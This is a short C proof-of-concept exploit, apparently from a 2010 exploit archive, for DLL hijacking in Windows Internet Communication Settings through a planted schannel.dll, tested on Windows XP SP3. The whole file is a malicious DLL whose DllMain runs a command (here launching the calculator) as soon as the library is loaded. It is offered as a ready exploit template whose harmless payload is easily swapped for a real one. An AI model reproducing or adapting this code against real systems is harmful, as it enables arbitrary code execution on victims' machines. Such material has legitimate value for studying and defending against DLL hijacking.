1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 |
/* # Exploit Title: Windows Internet Communication Settings DLL Hijacking Exploit (schannel.dll) # Date: 25/08/2010 # Author: ALPdaemon # Email: ALPdaemon (at) yahoo (dot) com # Software Link: N/A # Tested on: Windows XP SP3 English # Extension: .isp */ #include <windows.h> int alpdaemon() { WinExec("calc", SW_SHOW); exit(0); return 0; } BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason, LPVOID lpvReserved) { alpdaemon(); return 0; } |